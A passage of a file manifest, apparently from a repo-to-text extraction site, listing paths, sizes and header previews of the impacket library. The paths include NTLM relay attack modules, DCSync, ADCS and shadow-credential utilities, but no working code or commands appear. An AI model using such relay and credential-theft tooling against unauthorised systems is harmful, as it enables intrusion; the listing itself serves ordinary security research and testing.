"chars": 1653,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/ICMP6.py",
"chars": 19616,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/IP6.py",
"chars": 6740,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/IP6_Address.py",
"chars": 9793,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/IP6_Extension_Headers.py",
"chars": 11030,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/ImpactDecoder.py",
"chars": 33377,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/ImpactPacket.py",
"chars": 67164,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/NDP.py",
"chars": 6708,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/__init__.py",
"chars": 881,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/acl.py",
"chars": 21700,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/cdp.py",
"chars": 13576,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/crypto.py",
"chars": 13717,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/__init__.py",
"chars": 322,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/__init__.py",
"chars": 322,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/atsvc.py",
"chars": 6891,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/bkrp.py",
"chars": 4818,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/dcom/__init__.py",
"chars": 322,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/dcom/comev.py",
"chars": 58553,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/dcom/oaut.py",
"chars": 32769,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/dcom/scmp.py",
"chars": 12369,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/dcom/vds.py",
"chars": 9672,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/dcom/wmi.py",
"chars": 135620,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/dcomrt.py",
"chars": 68578,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/dhcpm.py",
"chars": 39690,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/drsuapi.py",
"chars": 43641,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/dssp.py",
"chars": 6693,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/dtypes.py",
"chars": 14869,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/enum.py",
"chars": 28208,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/epm.py",
"chars": 94452,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/even.py",
"chars": 12460,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/even6.py",
"chars": 14759,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/gkdi.py",
"chars": 7837,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/icpr.py",
"chars": 7287,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/iphlp.py",
"chars": 6237,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/lsad.py",
"chars": 57758,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/lsat.py",
"chars": 16138,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/mgmt.py",
"chars": 5279,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/mimilib.py",
"chars": 7470,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/ndr.py",
"chars": 67607,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/nrpc.py",
"chars": 95106,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/nspi.py",
"chars": 38542,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/oxabref.py",
"chars": 4471,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/par.py",
"chars": 22099,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/rpch.py",
"chars": 32256,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/rpcrt.py",
"chars": 100158,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/rprn.py",
"chars": 26166,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/rrp.py",
"chars": 31123,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/samr.py",
"chars": 99478,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/sasec.py",
"chars": 6301,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/scmr.py",
"chars": 44811,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/srvs.py",
"chars": 90071,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/transport.py",
"chars": 21048,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/tsch.py",
"chars": 23198,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/tsts.py",
"chars": 123972,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dcerpc/v5/wkst.py",
"chars": 34886,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dhcp.py",
"chars": 6978,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dns.py",
"chars": 26678,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dot11.py",
"chars": 111982,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dpapi.py",
"chars": 47172,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/dpapi_ng.py",
"chars": 11308,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/eap.py",
"chars": 1525,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/ese.py",
"chars": 36496,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/__init__.py",
"chars": 1736,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ldap_shell.py",
"chars": 34743,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/logger.py",
"chars": 2600,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/mssqlshell.py",
"chars": 15865,
"preview": "#!/usr/bin/env python\r\n# Impacket - Collection of Python classes for working with network protocols.\r\n#\r\n# Copyright For"
},
{
"path": "impacket/examples/ntlmrelayx/__init__.py",
"chars": 322,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/attacks/__init__.py",
"chars": 4102,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/attacks/dcsyncattack.py",
"chars": 1085,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/attacks/httpattack.py",
"chars": 2019,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/attacks/httpattacks/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py",
"chars": 6514,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/attacks/httpattacks/sccmdpattack.py",
"chars": 8346,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# SECUREAUTH LABS. Copyright (C) 2022 Se"
},
{
"path": "impacket/examples/ntlmrelayx/attacks/httpattacks/sccmpoliciesattack.py",
"chars": 28832,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# SECUREAUTH LABS. Copyright (C) 2022 Se"
},
{
"path": "impacket/examples/ntlmrelayx/attacks/imapattack.py",
"chars": 3856,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/attacks/ldapattack.py",
"chars": 59807,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/attacks/mssqlattack.py",
"chars": 2010,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/attacks/rpcattack.py",
"chars": 7515,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/attacks/smbattack.py",
"chars": 11530,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/attacks/winrmattack.py",
"chars": 10214,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright (C) 2023 Fortra. All rights "
},
{
"path": "impacket/examples/ntlmrelayx/clients/__init__.py",
"chars": 4954,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/clients/dcsyncclient.py",
"chars": 21008,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/clients/httprelayclient.py",
"chars": 6164,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/clients/imaprelayclient.py",
"chars": 4059,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/clients/ldaprelayclient.py",
"chars": 9502,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/clients/mssqlrelayclient.py",
"chars": 7497,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/clients/rpcrelayclient.py",
"chars": 8510,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/clients/smbrelayclient.py",
"chars": 29580,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/clients/smtprelayclient.py",
"chars": 3230,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/clients/winrmrelayclient.py",
"chars": 7832,
"preview": "import re\nimport ssl\nimport base64\n\ntry:\n from http.client import HTTPSConnection\nexcept ImportError:\n from httpli"
},
{
"path": "impacket/examples/ntlmrelayx/servers/__init__.py",
"chars": 1044,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/servers/httprelayserver.py",
"chars": 28840,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/servers/mssqlrelayserver.py",
"chars": 17848,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/servers/rawrelayserver.py",
"chars": 10734,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/servers/rdprelayserver.py",
"chars": 18050,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/servers/rpcrelayserver.py",
"chars": 23455,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "impacket/examples/ntlmrelayx/servers/smbrelayserver.py",
"chars": 45608,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/servers/socksplugins/__init__.py",
"chars": 1154,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/servers/socksplugins/http.py",
"chars": 8421,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/servers/socksplugins/https.py",
"chars": 2009,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/servers/socksplugins/imap.py",
"chars": 9681,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/servers/socksplugins/imaps.py",
"chars": 2857,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/servers/socksplugins/ldap.py",
"chars": 14738,
"preview": "import select\nfrom pyasn1.codec.ber import encoder, decoder\nfrom pyasn1.error import SubstrateUnderrunError\nfrom pyasn1."
},
{
"path": "impacket/examples/ntlmrelayx/servers/socksplugins/ldaps.py",
"chars": 1441,
"preview": "import select\nfrom impacket import LOG\nfrom impacket.examples.ntlmrelayx.servers.socksplugins.ldap import LDAPSocksRelay"
},
{
"path": "impacket/examples/ntlmrelayx/servers/socksplugins/mssql.py",
"chars": 9370,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/servers/socksplugins/smb.py",
"chars": 27041,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/servers/socksplugins/smtp.py",
"chars": 7001,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/servers/socksserver.py",
"chars": 20572,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "impacket/examples/ntlmrelayx/servers/wcfrelayserver.py",
"chars": 17589,
"preview": "# -*- coding: utf-8 -*-\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fort"
},
{
"path": "impacket/examples/ntlmrelayx/servers/winrmrelayserver.py",
"chars": 28106,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright (C) 2022 Fortra. All rights "
},
{
"path": "impacket/examples/ntlmrelayx/servers/winrmsrelayserver.py",
"chars": 28197,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright (C) 2022 Fortra. All rights "
},
{
"path": "impacket/examples/ntlmrelayx/utils/__init__.py",
"chars": 322,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/utils/config.py",
"chars": 9421,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/utils/enum.py",
"chars": 2617,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/utils/identity_log.py",
"chars": 883,
"preview": "# impacket/examples/ntlmrelayx/utils/identity_log.py\nimport logging\nimport threading\nfrom contextlib import contextmanag"
},
{
"path": "impacket/examples/ntlmrelayx/utils/rdp_ssl.py",
"chars": 2537,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/utils/shadow_credentials.py",
"chars": 5625,
"preview": "from struct import pack\nfrom Cryptodome.Util.number import long_to_bytes\nimport base64\nimport uuid\nimport datetime\nimpor"
},
{
"path": "impacket/examples/ntlmrelayx/utils/ssl.py",
"chars": 2901,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/examples/ntlmrelayx/utils/targetsutils.py",
"chars": 9149,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
}
]
// ... and 150 more files (download for full content)
About this extraction
This page contains the full source code of the fortra/impacket GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 350 files (8.4 MB), approximately 2.2M tokens, and a symbol index with 11233 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.